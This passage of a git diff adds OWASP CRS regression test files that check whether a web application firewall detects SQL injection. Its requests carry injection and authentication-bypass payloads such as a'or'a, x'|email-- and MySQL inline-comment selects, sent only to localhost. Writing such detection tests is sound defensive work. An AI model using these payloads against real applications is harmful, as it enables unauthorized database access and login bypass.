text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-6 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\"2562*23" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-7 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-8 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-9 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-10 + desc: "classic SQL injection probings 3/3" + stages: + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-11 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>9e7" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-12 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-13 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-14 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log_contains: id "942490" 
+ - test_title: 942490-15 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-16 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":60" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-17 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-18 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":35" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-19 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 
80 + uri: "/" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-20 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-21 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='16/17" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-22 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\";}7b6" + version: HTTP/1.0 + output: + log_contains: id "942490" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml new file mode 100644 index 00000000..c99e1644 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml 
@@ -0,0 +1,39 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 942500.yaml +tests: + - test_title: 942500-1 + desc: "MySQL in-line comment detection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_title: 942500-2 + desc: "Status Page Test - MySQL inline comment detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log_contains: id "942500" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml new file mode 100644 index 00000000..a57e20af --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml 
@@ -0,0 +1,39 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 942510.yaml +tests: + - test_title: 942510-1 + desc: "SQLi bypass detected: backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?`bla`" + version: HTTP/1.0 + output: + log_contains: id "942510" + - test_title: 942510-2 + desc: "SQLi bypass detected: backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?'bla'" + version: HTTP/1.0 + output: + no_log_contains: id "942510" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml new file mode 100644 index 00000000..797947b6 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml 
@@ -0,0 +1,39 @@ +--- +meta: + author: "Walter Hop" + description: None + enabled: true + name: 942511.yaml +tests: + - test_title: 942511-1 + desc: "SQLi bypass detected: quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?`bla`" + version: HTTP/1.0 + output: + no_log_contains: id "942511" + - test_title: 942511-2 + desc: "SQLi bypass detected: quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?'bla'" + version: HTTP/1.0 + output: + log_contains: id "942511" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml new file mode 100644 index 00000000..ce2aa97f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml 
@@ -0,0 +1,387 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.0/4" + enabled: true + name: 942520.yaml +tests: + - test_title: 942520-1 + desc: "Detects basic SQL auth bypass with 'is not something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-2 + desc: "Negative test: 'is notes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-3 + desc: "Detects basic SQL auth bypass with 'not like something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-4 + desc: "Detects basic SQL auth bypass with 'not glob'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-5 + desc: "Detects basic SQL auth bypass with 'not like glob'" + stages: + - stage: + 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-6 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-7 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-8 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-9 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-10 + desc: "Nagive test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-11 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-12 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-14 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + 
log_contains: id "942520" + - test_title: 942520-15 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-16 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-17 + desc: "Negative test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-18 + desc: "Detects basic SQL auth bypass with mod" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-19 + desc: "Detects basic SQL auth bypass with: sounds like" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-20 + desc: "Bypass with a comment" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-21 + desc: "Integration test: 942521 blocks foo'or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942520-22 + desc: "Integration test: 942522 blocks foo\\''or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942520-23 + desc: "Detect auth bypass email=' is not?--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log_contains: id "942520" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml new file mode 100644 index 00000000..848720a5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml 
@@ -0,0 +1,387 @@
+---
+meta:
+ author: "terjanq, Franziska Bühler"
+ description: "Detects basic SQL authentication bypass attempts 4.1/4"
+ enabled: true
+ name: 942521.yaml
+tests:
+ - test_title: 942521-1
+ desc: "Detects the most basic authentication bypass with 'or'"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "var=a'or'a"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_title: 942521-2
+ desc: "Detects basic SQLite authentication bypass with 'or?'"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "var=a'or?--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_title: 942521-3
+ desc: "False-positive: Detects or-based authentication bypass"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ data: "var=is%20this%20your%20parents'%20or%20yours?"
+ version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-4 + desc: "Detects basic SQL auth bypass and-based" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-5 + desc: "False-positve: is it your parents' or yours" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-6 + desc: "Negative test: bob's or alice's" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-7 + desc: "Negative test: mother or daugher" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-8 + desc: "Negative test: 'oreo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='oreo" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-9 + desc: "Negative test: 'fork" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='fork" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-10 + desc: "Negative test: 'for" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%20for" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-11 + desc: "Negative test: ''or" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-12 + desc: "Negative test: 'books' or 'applles'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-13 + desc: "Negative test: bob's presentation's 'or'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-14 + desc: "Bypass with '''or 1" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='''or%201" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-15 + desc: "False-negative: Not detected with escapes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-16 + desc: "Negative test: Wikipedia article about SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 
"var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A